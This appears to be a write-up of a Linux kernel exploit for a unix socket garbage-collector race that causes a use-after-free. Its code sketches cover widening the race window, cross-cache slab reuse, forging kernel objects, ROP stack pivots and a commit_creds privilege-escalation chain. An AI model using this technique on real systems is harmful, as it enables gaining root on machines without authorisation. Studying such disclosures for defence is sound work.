## Triggering the race condition

In this vulnerability we have two race windows.
The first one is in unix_stream_connect():

```
static int unix_stream_connect(struct socket *sock, struct sockaddr *uaddr,
			       int addr_len, int flags)
{
...
	unix_peer(sk) = newsk;

[window 1 start]
	unix_state_unlock(sk);

	/* take ten and send info to listening sock */
	spin_lock(&other->sk_receive_queue.lock);
[window 1 end]

	__skb_queue_tail(&other->sk_receive_queue, skb);
	spin_unlock(&other->sk_receive_queue.lock);
...
```

This function is triggered by calling connect() on CPU 0. This CPU will do nothing else until the race-condition part of the exploit is over.

We have to use the other available CPU to perform three operations during this window (a sketch of the first two follows the list):
1. Send the victim socket through this connecting socket.
2. Close the victim socket.
3. Trigger garbage collection and run unix_gc() until the start of window 2.
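
A minimal sketch of steps 1 and 2, loosely mirroring what the exploit's child_send() thread does (the fd names and the helper are hypothetical; passing an fd via SCM_RIGHTS is what makes the victim socket "inflight"):

```
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Runs on CPU 1 during window 1: client_fd is the socket that CPU 0 is
 * currently inside connect() on, victim_fd is the socket we want the
 * garbage collector to mis-account. */
static void child_send_steps(int client_fd, int victim_fd)
{
	char dummy = 'A';
	struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
	union {
		char buf[CMSG_SPACE(sizeof(int))];
		struct cmsghdr align;
	} u;
	struct msghdr msg = {
		.msg_iov = &iov,
		.msg_iovlen = 1,
		.msg_control = u.buf,
		.msg_controllen = sizeof(u.buf),
	};
	struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);

	cmsg->cmsg_level = SOL_SOCKET;
	cmsg->cmsg_type = SCM_RIGHTS;	/* attach an fd to the message */
	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
	memcpy(CMSG_DATA(cmsg), &victim_fd, sizeof(int));

	sendmsg(client_fd, &msg, 0);	/* 1. victim goes inflight */
	close(victim_fd);		/* 2. drop our fd reference */
}
```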

If we start too early, the send fails because the socket is not connected yet, and the exploit attempt is wasted.

The second window is in the unix_gc() function:
```
void unix_gc(void)
{
...
	list_for_each_entry(u, &gc_candidates, link)
		scan_children(&u->sk, dec_inflight, NULL);

[window 2 start]
	/* Restore the references for children of all candidates,
	 * which have remaining references. Do this recursively, so
	 * only those remain, which form cyclic references.
	 *
	 * Use a "cursor" link, to make the list traversal safe, even
	 * though elements might be moved about.
	 */
	list_add(&cursor, &gc_candidates);
[window 2 end]
	while (cursor.next != &gc_candidates) {
		u = list_entry(cursor.next, struct unix_sock, link);

		/* Move cursor to after the current position. */
		list_move(&cursor, &u->link);

		if (atomic_long_read(&u->inflight) > 0) {
			list_move_tail(&u->link, &not_cycle_list);
			__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
			scan_children(&u->sk, inc_inflight_move_tail, NULL);
		}
	}
	list_del(&cursor);
...
```

For the vulnerability to be triggered, two conditions have to be met:
1. The first scan_children() must not see the embryo in the receive queue of the server socket.
2. The second scan_children() has to see the embryo.

This way inc_inflight_move_tail() runs for the embryo's children without the matching dec_inflight() having run first, causing a decrement/increment mismatch and the resulting use-after-free.

In other words, window 2 has to run entirely inside window 1 of unix_stream_connect().

To have a chance of aligning the two threads correctly, we have to extend both race windows as much as possible.
To do that we use a well-known timerfd technique invented by Jann Horn.
The basic idea is to arm an hrtimer-based timerfd so that its timer interrupt fires during the race window, and to attach as many epoll watches to this timerfd as RLIMIT_NOFILE allows, making the interrupt take longer to handle.
For more details see the original [blog post](https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html).
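
A minimal sketch of this setup under illustrative assumptions (NR_EPOLLS is bounded by RLIMIT_NOFILE, and the delay has to be tuned experimentally so the interrupt lands inside the window):

```
#include <sys/epoll.h>
#include <sys/timerfd.h>

#define NR_EPOLLS 500	/* illustrative; bounded by RLIMIT_NOFILE */

static int epfds[NR_EPOLLS];

static int setup_timer(void)
{
	int tfd = timerfd_create(CLOCK_MONOTONIC, 0);
	struct epoll_event ev = { .events = EPOLLIN };

	/* Each epoll instance watching the timerfd adds work for the
	 * timer interrupt handler, stretching the race window. */
	for (int i = 0; i < NR_EPOLLS; i++) {
		epfds[i] = epoll_create1(0);
		epoll_ctl(epfds[i], EPOLL_CTL_ADD, tfd, &ev);
	}
	return tfd;
}

static void arm_timer(int tfd, long delay_ns)
{
	/* One-shot timer intended to fire mid-window. */
	struct itimerspec its = { .it_value.tv_nsec = delay_ns };

	timerfd_settime(tfd, 0, &its, NULL);
}
```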

Here's the triggering sequence (we use two CPUs; CPU 1 executes the child_send() thread):

| CPU 0 | CPU 1 |
| -------- | -------- |
| arms timer 1 to trigger after a delay | - |
| calls connect() on the client socket | - |
| unix_stream_connect() runs until the start of window 1 | - |
| timer 1 is triggered during window 1 | - |
| timer goes through all epoll notifications | sends victim socket through the client socket |
| ... | closes victim socket |
| ... | arms timer 2 to trigger after a delay |
| ... | closes another socket to trigger unix_gc() |
| ... | unix_gc() runs until the start of window 2 |
| ... | timer 2 is triggered during window 2 |
| timer 1 handler ends | timer goes through all epoll notifications |
| window 1 ends, embryo is added to the receive queue | ... |
| - | timer 2 handler ends, window 2 ends |
| - | second scan_children() executes inc_inflight_move_tail() on the victim socket |

## Exploiting the use-after-free

At this point our victim socket is inflight, linked into the gc_inflight_list, and has an inflight reference count of 2.
The next step is to receive this socket and close it. This causes its struct sock object to be freed while it stays referenced in the gc_inflight_list.
In the case of unix sockets, struct sock is allocated from a dedicated kmem cache called 'UNIX'. On our target one slab takes an order-2 page (size 0x4000) and fits 15 objects.
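
Receiving the fd back is the mirror image of the send above (a sketch; recv_fd() and accepted_fd are hypothetical names, the latter being the server-side socket the message was queued on):

```
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Read one queued message and pull the passed fd out of its SCM_RIGHTS
 * control message. */
static int recv_fd(int accepted_fd)
{
	char dummy;
	struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
	union {
		char buf[CMSG_SPACE(sizeof(int))];
		struct cmsghdr align;
	} u;
	struct msghdr msg = {
		.msg_iov = &iov,
		.msg_iovlen = 1,
		.msg_control = u.buf,
		.msg_controllen = sizeof(u.buf),
	};
	int fd = -1;

	recvmsg(accepted_fd, &msg, 0);
	memcpy(&fd, CMSG_DATA(CMSG_FIRSTHDR(&msg)), sizeof(int));
	return fd;
}

/* close(recv_fd(accepted_fd)) then frees the victim's struct sock, while
 * the gc_inflight_list keeps pointing at the freed memory. */
```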

To be able to exploit the use-after-free we have to cause the slab containing our victim object to be discarded and returned to the page allocator.
This is done using standard cross-cache techniques (see the sketch after this list):
1. Free all objects of the given slab.
2. Create a lot of partial slabs to unfreeze the empty slab and get it discarded.
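
A hedged sketch of these two steps (unix_fds[] and the batch count are illustrative assumptions; on the target a UNIX slab holds 15 objects):

```
#include <sys/socket.h>
#include <unistd.h>

#define OBJS_PER_SLAB 15	/* objects per UNIX slab on the target */
#define NR_BATCHES    64	/* illustrative: enough partial slabs  */

/* unix_fds[] holds sockets sprayed earlier so that the victim's slab
 * contains only objects we control. */
static void cross_cache_discard(int unix_fds[OBJS_PER_SLAB])
{
	/* 1. Free every object in the victim's slab, emptying it. */
	for (int i = 0; i < OBJS_PER_SLAB; i++)
		close(unix_fds[i]);

	/* 2. Allocate fresh slabs and free a single object from each:
	 *    the resulting partial slabs push the empty slab out of the
	 *    percpu partial list so it gets discarded to the page
	 *    allocator. */
	for (int i = 0; i < NR_BATCHES; i++) {
		int batch[OBJS_PER_SLAB];

		for (int j = 0; j < OBJS_PER_SLAB; j++)
			batch[j] = socket(AF_UNIX, SOCK_STREAM, 0);
		close(batch[0]);	/* leave this slab partial */
	}
}
```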

However, in this case we need maximum reliability - winning the race is such a rare event that we can't afford to make mistakes in the later stages of the exploit.

Because of this we used the /proc/zoneinfo parsing technique to establish a known UNIX cache state before starting the exploit attempt.
This is done in the get_fresh_unix() function.
One problem we have to solve is that when a unix socket is created, an allocation is also made from sock_inode_cache, which uses slabs of the same size (0x4000) as the UNIX cache, causing issues with detecting a new UNIX slab.

To solve this we first allocate some netlink sockets, which do not have their own dedicated sock object cache, so the only order-2 page allocation they cause comes from sock_inode_cache.
This allows us to get a fresh sock_inode_cache slab first and then proceed with unix socket allocations to get a fresh UNIX slab.
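
A sketch of that ordering (the counts are illustrative assumptions; the real get_fresh_unix() also parses /proc/zoneinfo between the steps to confirm a fresh order-2 page was taken):

```
#include <linux/netlink.h>
#include <sys/socket.h>

static int netlink_fds[32];
static int unix_fds[15];

static void get_fresh_unix_sketch(void)
{
	/* Step 1: netlink sockets only cause order-2 slab allocations
	 * via sock_inode_cache, getting us onto a fresh inode slab. */
	for (int i = 0; i < 32; i++)
		netlink_fds[i] = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);

	/* Step 2: from now on a new order-2 allocation can only be a
	 * fresh UNIX slab, which we fill with our own sockets. */
	for (int i = 0; i < 15; i++)
		unix_fds[i] = socket(AF_UNIX, SOCK_STREAM, 0);
}
```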

After the slab page is returned to the page allocator we can easily reallocate it using an xattr of size 0x4000 - xattrs larger than 0x2000 are allocated directly from the page allocator.
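
For example (a sketch; the file path and xattr name are hypothetical, and the file lives on tmpfs so the value stays allocated):

```
#include <stddef.h>
#include <string.h>
#include <sys/xattr.h>

/* Reclaim the freed order-2 page: the kernel allocates a 0x4000-byte
 * buffer for the xattr value straight from the page allocator. */
static int reclaim_slab_page(const char *tmpfs_path, const void *payload,
			     size_t len)
{
	char value[0x4000] = { 0 };

	memcpy(value, payload, len < sizeof(value) ? len : sizeof(value));
	return setxattr(tmpfs_path, "user.spray", value, sizeof(value), 0);
}
```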

## Getting RIP control

At this point we have a struct sock object linked into the gc_inflight_list that we can fill with arbitrary data.
This list is used by unix_gc(): if we craft a fake sock object convincing enough, unix_gc() will traverse the gc_inflight_list and move sk_buff objects from our sock object to the 'hitlist' that is then passed to __skb_queue_purge().

unix_gc() uses list handling functions to move the victim object between lists multiple times and CONFIG_DEBUG_LIST is on, so our object has to have valid prev/next list pointers.
Also, fields such as sk_socket->file are accessed, meaning we also have to craft the related objects (or at least parts of them): struct socket, struct file, struct inode and finally the sk_buff - the object that will contain the function pointer giving us RIP control and the ROP chain.
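
Conceptually, the forged object graph looks roughly like this (every offset and field below is a hypothetical placeholder, not a real kernel layout; the actual offsets have to be taken from the target kernel build):

```
#include <stdint.h>

/* Placeholder layouts - only the fields unix_gc() and the skb purge path
 * are known to touch. All objects sit at known direct-mapping addresses,
 * so they can point at each other. */
struct fake_file   { uint64_t f_inode;	/* -> fake struct inode */ };
struct fake_socket { uint64_t file;	/* -> fake struct file  */ };
struct fake_skb {
	uint64_t next, prev;	/* valid list pointers for DEBUG_LIST */
	uint64_t destructor;	/* RIP control when the skb is purged */
};
struct fake_sock {
	uint64_t gc_next, gc_prev;	/* gc_inflight_list linkage   */
	uint64_t sk_socket;		/* -> fake struct socket      */
	uint64_t receive_queue[3];	/* queue head -> fake sk_buff */
};
```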

But first, we need a place with a known address to store all these objects.

### Crafting objects in kernel memory

The fake kernel objects were sprayed into physical memory by creating a lot of large tmpfs xattrs and are referenced using a direct mapping address - more details about that can be found in the [novel techniques](novel-techniques.md) section.

The first fake socket, which replaces the victim object on the gc_inflight_list, is prepared in prepare_sock() and has pointers to the ones prepared in prepare_more_socks(). These are actually allocated at the very beginning of the exploit - we can do that because their location in memory is known in advance.

### Triggering the sk_buff destructor to get RIP control

When an inflight socket is chosen to be released by unix_gc(), the sk_buff carrying it is removed from the sk_receive_queue and linked into the 'hitlist', and then __skb_queue_purge() is called on that list:
```
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
	struct sk_buff *skb;
	while ((skb = __skb_dequeue(list)) != NULL)
		kfree_skb(skb);
}
```

If this is the last reference to a given skb, skb_release_head_state() is eventually called:
```
void skb_release_head_state(struct sk_buff *skb)
{
	skb_dst_drop(skb);
	if (skb->destructor) {
		DEBUG_NET_WARN_ON_ONCE(in_hardirq());
		skb->destructor(skb);
	}
#if IS_ENABLED(CONFIG_NF_CONNTRACK)
	nf_conntrack_put(skb_nfct(skb));
#endif
	skb_ext_put(skb);
}
```

Because we control all the contents of the sk_buff object we can make sure the destructor will be called.
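
A sketch of how the relevant fields could be planted in the fake sk_buff (all offsets and the gadget address are hypothetical, version-dependent values):

```
#include <stdint.h>
#include <string.h>

#define SKB_LIST_OFF       0x00	/* next/prev pointers (hypothetical)  */
#define SKB_DESTRUCTOR_OFF 0x68	/* skb->destructor (hypothetical)     */
#define SKB_USERS_OFF      0xc4	/* skb->users refcount (hypothetical) */
#define PIVOT_GADGET 0xffffffff81234567UL	/* hypothetical address */

static void put64(uint8_t *p, uint64_t v) { memcpy(p, &v, sizeof(v)); }
static void put32(uint8_t *p, uint32_t v) { memcpy(p, &v, sizeof(v)); }

/* skb points into the xattr payload; queue_addr is the direct-mapping
 * address of the fake receive queue head it is linked into. */
static void craft_skb(uint8_t *skb, uint64_t queue_addr)
{
	put64(skb + SKB_LIST_OFF + 0, queue_addr);	/* next: sane unlink */
	put64(skb + SKB_LIST_OFF + 8, queue_addr);	/* prev */
	put32(skb + SKB_USERS_OFF, 1);	/* last ref: kfree_skb() releases */
	put64(skb + SKB_DESTRUCTOR_OFF, PIVOT_GADGET);	/* RDI = skb */
}
```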

## Pivot to ROP

When the destructor is called, RDI contains a pointer to our fake sk_buff object.
The first 16 bytes of this object are used by the list head, so we can't start our ROP chain there.

The following chain of gadgets allows us to pivot to rdi+0x10, where our ROP chain starts:

```
mov r8,QWORD PTR [rdi+0xc8]
mov eax,0x1
test r8,r8
je 0xffffffff8218aac1
mov rsi,rdi
mov rcx,r14
mov rdi,rbp
mov rdx,r15
call 0xffffffff8242ca60 <__x86_indirect_thunk_r8>
```

This copies RDI to RSI and calls the next gadget through the pointer we planted at rdi+0xc8.

```
push rsi
jmp qword [rsi-0x70]
```

This pushes RSI (the fake sk_buff address) onto the stack. We can safely use the -0x70 offset because our sk_buff is part of a larger allocation.

Finally:

```
pop rsp
pop rbp
pop rbx
ret
```

The pop rsp turns the pushed sk_buff address into the new stack pointer, and the two pops that follow move RSP past the list_head at the start of the sk_buff, so the ret lands at offset 0x10.

## Second pivot

There is not much space at the beginning of the sk_buff - the next used field is at offset 0x38, so we have room for only 3 gadgets, but this is enough to pivot to a larger space with a simple pop rsp ; ret.
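
Putting both pivots together, the head of the fake sk_buff could look like this (a sketch; all symbolic addresses are hypothetical and resolved against the target kernel and the spray):

```
#include <stdint.h>

#define FAKE_LIST_PTR 0xffff888012345000UL	/* valid prev/next      */
#define POP_RSP_RET   0xffffffff81111111UL	/* pop rsp ; ret gadget */
#define STAGE2_ADDR   0xffff888012346000UL	/* larger ROP buffer    */

uint64_t fake_skb_head[] = {
	/* +0x00 */ FAKE_LIST_PTR,	/* consumed by pop rbp          */
	/* +0x08 */ FAKE_LIST_PTR,	/* consumed by pop rbx          */
	/* +0x10 */ POP_RSP_RET,	/* first pivot's ret lands here */
	/* +0x18 */ STAGE2_ADDR,	/* becomes RSP: stage 2 chain   */
};
```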

## Privilege escalation

The second stage of the ROP does the standard commit_creds(init_cred); switch_task_namespaces(pid, init_nsproxy); sequence and returns to userspace.
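
For illustration, such a stage could be laid out like this (every symbolic address below is a hypothetical placeholder to be resolved against the target build):

```
#include <stdint.h>

#define POP_RDI_RET	0xffffffff81000001UL	/* pop rdi ; ret        */
#define POP_RSI_RET	0xffffffff81000002UL	/* pop rsi ; ret        */
#define INIT_CRED	0xffffffff82000000UL	/* &init_cred           */
#define INIT_NSPROXY	0xffffffff82000100UL	/* &init_nsproxy        */
#define TASK_STRUCT	0xffff888012347000UL	/* our task, found earlier */
#define COMMIT_CREDS	0xffffffff810a0000UL
#define SWITCH_TASK_NAMESPACES 0xffffffff810a1000UL
#define RET_TO_USER	0xffffffff81000003UL	/* return-to-userspace stub */

uint64_t stage2[] = {
	POP_RDI_RET, INIT_CRED,		/* rdi = &init_cred       */
	COMMIT_CREDS,			/* become root            */
	POP_RDI_RET, TASK_STRUCT,	/* rdi = our task         */
	POP_RSI_RET, INIT_NSPROXY,	/* rsi = &init_nsproxy    */
	SWITCH_TASK_NAMESPACES,		/* escape namespaces      */
	RET_TO_USER,			/* back to userspace      */
};
```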